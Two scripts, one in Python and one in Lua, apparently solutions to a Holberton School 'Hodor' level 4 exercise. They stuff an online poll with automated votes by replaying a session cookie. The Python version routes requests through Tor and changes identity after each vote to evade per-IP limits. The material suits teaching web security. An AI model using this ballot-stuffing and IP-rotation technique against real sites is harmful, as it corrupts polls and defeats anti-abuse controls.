File: hodor/level_4/Python/hodor4.py
#!/usr/bin/env python

"""

===---Hodor Level 4----------------------------------------------------------===
   Solution for the Hodor Project, Level 4 by Julien Barbier.
   Using Python script and Tor network with Stem and requesocks.

   by Alexandro de Oliveira, for Holberton School
===--------------------------------------------------------------------------===

"""

from stem import Signal
from stem.control import Controller
import requesocks
from time import sleep

session = requesocks.session()
# Tor uses the 9050 port as the default socks port
session.proxies = {'http':  'socks5://127.0.0.1:9050',
                   'https': 'socks5://127.0.0.1:9050'}

# Getting password for Tor controller:
passwd = raw_input('Enter the Tor password => ')

# Make a request through the Tor connection(using your current Tor 'exit')
# IP visible through Tor:(To check your current IP in Tor network)
# print session.get("http://httpbin.org/ip").text
# Above should print an IP different than your public IP
# Following prints your normal public IP

# Signal TOR for a new connection
def renew_connection():
    with Controller.from_port(port = 9051) as controller:
        controller.authenticate(password=passwd)
        controller.signal(Signal.NEWNYM)

# As the amount of errors(recurring IPs) could be huge we needs to ensure that we get the
# right amount of votes we want. We are using a while and the counter just
# increments when we get a valid vote.
vote = 1
total_votes = 100
while vote < total_votes:
    # If you want to check your current IP:
    # print session.get("https://api.ipify.org").text
    # print session.get("http://httpbin.org/ip").text
    url = "http://173.246.108.142/level4.php"
    headers = { "Referer": url }
    # HEAD Request to get a valid cookie:
    head = session.head(url, headers = headers)
    # print head.headers
    cookie = head.cookies["HoldTheDoor"]
    # Add the cookie to the header:
    headers['Cookie'] = "HoldTheDoor=" + cookie
    body = {
        'id': '23',
        'holdthedoor': 'submit',
        'key': cookie,
    }
    post = session.post(url, data = body, headers = headers)
    post_cookie = post.headers['set-cookie']
    if post_cookie:
        print "Vote number: " + str(vote)
        vote += 1
        # For more info(debug):
        # print post.headers
        # print post.text
    else:
        print "Failed..."

    # Requeste new identity:
    renew_connection()
    # Wait a bit in order to make sure your new identity would be granted by the Tor network:
    sleep(10)

File: hodor/level_4/Lua/hodor4.lua
#!/usr/bin/env lua
--[[
 ===-----------------------------------------------------------------------===
      Hodor Project level 4, by Julien Barbier
      Using Lua script through socks5 Tor proxy.

      By Alexandro de Oliveira.
 ===-----------------------------------------------------------------------===
--]]

--  To install the http package do: $ luarocks install luasocket
local http = require "socket.http"
local ltn12 = require "ltn12"
require "utils" -- Importing the external file utils.lua.

local url = "http://173.246.108.142/level4.php"
local count = 0
io.write("How many votes? => ") -- Prints the message requesting total votes.
local total = io.read("*n")     -- Reading a number from user.

while count < total do
    -- HEAD request to get a cookie and use it in the POST request.
    local body, code, headers, status = http.request {
        method = "HEAD",
        url = url,
        headers =
                {
                        ['User-Agent'] = "Windows NT 5.1 'Moonlight' Havk64 Lua Requests"
                }
    }
    local hc = headers['set-cookie']
    -- print (hc)
    local tcookie = parse(hc)
    local cookie = tcookie['cookie']
    local value = tcookie['value']
    -- Print the Header of HEAD request:
    -- print (p(headers))

    -- Preparing the POST request:
    local reqbody = "id=23&holdthedoor=submit&key="..value
    local respbody = {}
    local body, code, headers, status = http.request {
        method = "POST",
        url = url,
        source = ltn12.source.string(reqbody),
        headers =
                {
                        ["Accept"] = "*/*",
                        ["Accept-Encoding"] = "gzip, deflate",
                        ["Accept-Language"] = "en-us",
                        ["Referer"] = url,
                        ['User-Agent'] = "Windows NT 5.1 'Moonlight' Havk64 Lua Script Requests",
                        ["Cookie"] = cookie,
                        ["Content-Type"] = "application/x-www-form-urlencoded",
                        ["content-length"] = string.len(reqbody)
                    },

                    sink = ltn12.sink.table(respbody)

        }
        -- Checking the response header:
        -- print (p(headers))
        local test = headers['set-cookie']
        if test ~= nil then -- Testing if the vote was valied(a new cookie was set):
            print("Vote number: "..(count + 1))
            count = count + 1
        else
            print("Failed")
        end
end
